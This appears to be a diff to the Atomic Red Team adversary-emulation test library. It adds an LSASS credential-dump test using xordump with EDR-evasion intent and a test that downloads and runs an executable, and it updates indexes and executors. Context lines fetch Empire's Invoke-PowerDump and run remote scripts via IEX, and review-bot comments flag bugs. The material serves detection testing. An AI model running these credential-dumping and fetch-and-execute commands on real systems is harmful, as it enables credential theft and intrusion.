diff --git a/Gemfile.lock b/Gemfile.lock index 96f60456..68078e7a 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -208,14 +208,14 @@ GEM rb-fsevent (~> 0.10, >= 0.10.3) rb-inotify (~> 0.9, >= 0.9.10) mercenary (0.3.6) - mini_portile2 (2.5.0) + mini_portile2 (2.5.1) minima (2.5.1) jekyll (>= 3.5, < 5.0) jekyll-feed (~> 0.9) jekyll-seo-tag (~> 2.1) minitest (5.14.2) multipart-post (2.1.1) - nokogiri (1.11.1) + nokogiri (1.11.4) mini_portile2 (~> 2.5.0) racc (~> 1.4) octokit (4.19.0) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 8a3b34df..d296f349 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -228,6 +228,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell +credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt 
@@ -412,7 +413,7 @@ defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh -defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt +defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell 
@@ -642,10 +643,11 @@ discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7b discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh -discovery,T1135,Network Share Discovery,2,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt -discovery,T1135,Network Share Discovery,3,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell -discovery,T1135,Network Share Discovery,4,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt -discovery,T1135,Network Share Discovery,5,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell +discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash +discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt +discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell +discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt +discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt 
@@ -680,7 +682,7 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell -discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt +discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh 
@@ -732,6 +734,7 @@ execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell +execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 0f865aa6..906a2291 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv 
@@ -136,7 +136,7 @@ discovery,T1087.001,Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f discovery,T1069.001,Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh -discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh +discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 2d4561e6..0aab232a 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv 
@@ -84,7 +84,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual -defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt +defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash 
@@ -133,7 +133,7 @@ discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b3 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh -discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt +discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 2a0d36ac..d9ef501a 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -26,6 +26,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell +credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt 
@@ -455,10 +456,10 @@ discovery,T1069.001,Local Groups,2,Basic Permission Groups Discovery Windows (Lo discovery,T1069.001,Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell -discovery,T1135,Network Share Discovery,2,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt -discovery,T1135,Network Share Discovery,3,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell -discovery,T1135,Network Share Discovery,4,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt -discovery,T1135,Network Share Discovery,5,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell +discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt +discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell +discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt +discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt 
@@ -535,6 +536,7 @@ execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell +execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index d9a87458..815d45b6 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -450,6 +450,7 @@ - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] - Atomic Test #10: Powershell Mimikatz [windows] - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows] + - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) 
@@ -1123,11 +1124,12 @@ - Atomic Test #3: Port Scan NMap for Windows [windows] - Atomic Test #4: Port Scan using python [windows] - [T1135 Network Share Discovery](../../T1135/T1135.md) - - Atomic Test #1: Network Share Discovery [macos, linux] - - Atomic Test #2: Network Share Discovery command prompt [windows] - - Atomic Test #3: Network Share Discovery PowerShell [windows] - - Atomic Test #4: View available share drives [windows] - - Atomic Test #5: Share Discovery with PowerView [windows] + - Atomic Test #1: Network Share Discovery [macos] + - Atomic Test #2: Network Share Discovery - linux [linux] + - Atomic Test #3: Network Share Discovery command prompt [windows] + - Atomic Test #4: Network Share Discovery PowerShell [windows] + - Atomic Test #5: View available share drives [windows] + - Atomic Test #6: Share Discovery with PowerView [windows] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux [linux] - Atomic Test #2: Packet Capture macOS [macos] @@ -1327,6 +1329,7 @@ - Atomic Test #5: Office launching .bat file from AppData [windows] - Atomic Test #6: Excel 4 Macro [windows] - Atomic Test #7: Headless Chrome code execution via VBA [windows] + - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows] - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1106 Native API](../../T1106/T1106.md) - Atomic Test #1: Execution through API - CreateProcess [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 4df39794..18f9130e 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md 
@@ -408,7 +408,7 @@ - Atomic Test #1: Port Scan [linux, macos] - Atomic Test #2: Port Scan Nmap [linux, macos] - [T1135 Network Share Discovery](../../T1135/T1135.md) - - Atomic Test #1: Network Share Discovery [macos, linux] + - Atomic Test #2: Network Share Discovery - linux [linux] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux [linux] - [T1201 Password Policy Discovery](../../T1201/T1201.md) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 35ba3e08..ebfb40df 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -353,7 +353,7 @@ - Atomic Test #1: Port Scan [linux, macos] - Atomic Test #2: Port Scan Nmap [linux, macos] - [T1135 Network Share Discovery](../../T1135/T1135.md) - - Atomic Test #1: Network Share Discovery [macos, linux] + - Atomic Test #1: Network Share Discovery [macos] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #2: Packet Capture macOS [macos] - [T1201 Password Policy Discovery](../../T1201/T1201.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d2bd5efb..803162e4 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -50,6 +50,7 @@ - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] - Atomic Test #10: Powershell Mimikatz [windows] - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows] + - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) 
@@ -828,10 +829,10 @@ - Atomic Test #3: Port Scan NMap for Windows [windows] - Atomic Test #4: Port Scan using python [windows] - [T1135 Network Share Discovery](../../T1135/T1135.md) - - Atomic Test #2: Network Share Discovery command prompt [windows] - - Atomic Test #3: Network Share Discovery PowerShell [windows] - - Atomic Test #4: View available share drives [windows] - - Atomic Test #5: Share Discovery with PowerView [windows] + - Atomic Test #3: Network Share Discovery command prompt [windows] + - Atomic Test #4: Network Share Discovery PowerShell [windows] + - Atomic Test #5: View available share drives [windows] + - Atomic Test #6: Share Discovery with PowerView [windows] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #3: Packet Capture Windows Command Prompt [windows] - Atomic Test #4: Windows Internal Packet Capture [windows] @@ -981,6 +982,7 @@ - Atomic Test #5: Office launching .bat file from AppData [windows] - Atomic Test #6: Excel 4 Macro [windows] - Atomic Test #7: Headless Chrome code execution via VBA [windows] + - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows] - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1106 Native API](../../T1106/T1106.md) - Atomic Test #1: Execution through API - CreateProcess [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 71ce48ba..107864b9 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -20953,6 +20953,43 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'del #{output_file} +' + name: powershell + elevation_required: true + - name: Dump LSASS.exe using imported Microsoft DLLs + auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 + description: "The memory of lsass.exe is often dumped for offline credential + theft attacks. This can be achieved by\nimporting built-in DLLs and calling + exported functions. Xordump will re-read the resulting minidump \nfile and + delete it immediately to avoid brittle EDR detections that signature lsass + minidump files.\n\nUpon successful execution, you should see the following + file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n" + supported_platforms: + - windows + input_arguments: + xordump_exe: + description: Path to xordump + type: Path + default: C:\Windows\Temp\xordump.exe + output_file: + description: Path where resulting dump should be placed + type: Path + default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp + dependencies: + - description: 'Computer must have xordump.exe + +' + prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} + +' + get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" + -OutFile #{xordump_exe} + +' + executor: + command: "#{xordump_exe} -out #{output_file} -x 0x41\n" + cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore + ' name: powershell elevation_required: true 
@@ -22732,7 +22769,7 @@ credential-access: Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" - Import-Module .\PowerDump.ps1 + Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump name: powershell elevation_required: true @@ -32908,7 +32945,7 @@ defense-evasion: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: 'Verify the certificate exists. It generates if not on disk. @@ -32941,7 +32978,7 @@ defense-evasion: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: 'Verify the certificate exists. It generates if not on disk. @@ -32957,7 +32994,7 @@ defense-evasion: "#{cert_filename}" ' - name: command_prompt + name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 
@@ -42958,8 +42995,27 @@ defense-evasion: description: Path of folder to recursively set permissions on type: path default: C:\Users\Public\* + file_path: + description: Path of folder permission back + type: Path + default: "%temp%\\T1222.001-folder-perms-backup.txt" + dependency_executor_name: command_prompt + dependencies: + - description: 'Backup of original folder permissions should exist (for use + in cleanup commands) + +' + prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) + +' + get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 + +' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q + cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 + +' name: command_prompt elevation_required: true T1220: @@ -47503,7 +47559,6 @@ discovery: ' supported_platforms: - macos - - linux input_arguments: computer_name: description: Computer name to find a mount on. @@ -47515,6 +47570,38 @@ discovery: smbutil view -g //#{computer_name} showmount #{computer_name} name: sh + - name: Network Share Discovery - linux + auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae + description: 'Network Share Discovery using smbstatus + +' + supported_platforms: + - linux + input_arguments: + package_checker: + description: Package checking command. Debian - dpkg -s samba + type: string + default: rpm -q samba + package_installer: + description: Package installer command. Debian - apt install samba + type: string + default: yum install -y samba + dependency_executor_name: bash + dependencies: + - description: 'Package with smbstatus (samba) must exist on device + +' + prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit + 1; fi + +' + get_prereq_command: "sudo #{package_installer} \n" + executor: + command: 'smbstatus --shares + +' + name: bash + elevation_require: true - name: Network Share Discovery command prompt auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb description: | 
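Review bot: The new `cleanup_command` wraps the path in single quotes (`icacls ''#{path}'' ...`, which renders as `icacls '#{path}' /restore ...`), but the executor is `command_prompt`, where single quotes are not quoting characters, so icacls receives the literal quotes and the ACL restore is likely to fail behind `>nul 2>&1` without any signal. The attack command on the line above already uses double quotes, so the cleanup should match: `cleanup_command: 'icacls "#{path}" /restore #{file_path} /q >nul 2>&1'`. Because this cleanup is what reverts the `Everyone:F` grant, a silent failure leaves the target folder world-writable on the test host after the run. This hunk is in the generated index; the same change belongs in the technique's source YAML, which is outside this chunk.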
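Review bot: The new `Network Share Discovery - linux` test ends with `elevation_require: true`; the key is misspelled, so the generator ignores it, and the rendered T1135.md hunk later in this diff shows `Run with \`bash\`!` with no Elevation Required marker for this test. Change it to `elevation_required: true`, matching the other tests in this hunk. The `get_prereq_command` (`sudo #{package_installer}`) presumably exists to compensate; with the flag spelled correctly the runner would handle elevation, though how this runner treats the two together is not visible here. The fix belongs in the technique's source YAML, which is outside this chunk; the index is regenerated from it.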
@@ -48719,7 +48806,7 @@ discovery: supported_platforms: - macos executor: - name: command_prompt + name: sh elevation_required: false command: |- /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist @@ -54438,6 +54525,38 @@ execution: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell + - name: Potentially Unwanted Applications (PUA) + auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 + description: 'The Potentially Unwanted Applications (PUA) protection feature + in antivirus software can identify and block PUAs from downloading and installing + on endpoints in your network. These applications are not considered viruses, + malware, or other types of threats, but might perform actions on endpoints + that adversely affect their performance or use. This file is similar to EICAR + test virus file, but is considered a Potentially Unwanted Application (PUA) + instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify + anti-pua protection). + +' + supported_platforms: + - windows + input_arguments: + pua_url: + description: url to PotentiallyUnwanted.exe + type: url + default: http://amtso.eicar.org/PotentiallyUnwanted.exe + pua_file: + description: path to PotentiallyUnwanted.exe + type: Path + default: "$env:TEMP/PotentiallyUnwanted.exe" + executor: + name: powershell + elevation_required: false + command: | + Invoke-WebRequest #{pua_url} -OutFile #{pua_file} + & "#{pua_file}" + cleanup_command: 'Remove-Item #{pua_file} + +' T1204.001: technique: created: '2020-03-11T14:43:31.706Z' diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index aad552e0..26822e04 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md 
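Review bot: The new PUA test downloads an executable over cleartext HTTP (`pua_url` default `http://amtso.eicar.org/PotentiallyUnwanted.exe`) and immediately runs it with `& "#{pua_file}"`, with no integrity check in between, so anything on the network path to the test host can substitute an arbitrary binary for the benign AMTSO sample. A pinned-hash check would close that gap: add an input argument such as `pua_sha256` holding the expected digest (value to be supplied by the contributor) and compare it with `(Get-FileHash "#{pua_file}" -Algorithm SHA256).Hash` before the `&` line, exiting non-zero on mismatch. The template arguments are also unquoted; `Invoke-WebRequest "#{pua_url}" -OutFile "#{pua_file}"` holds up if a caller overrides `pua_file` with a path containing spaces. This hunk is the generated index; the change belongs in the technique's source YAML, which is outside this chunk.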
@@ -48,6 +48,8 @@ The following SSPs can be used to access credentials: - [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe) +- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls) +
@@ -564,4 +566,54 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec +
+
+ +## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs +The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by +importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump +file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. + +Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe| +| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +#{xordump_exe} -out #{output_file} -x 0x41 +``` + +#### Cleanup Commands: +```powershell +Remove-Item ${output_file} -ErrorAction Ignore +``` + + + +#### Dependencies: Run with `powershell`! 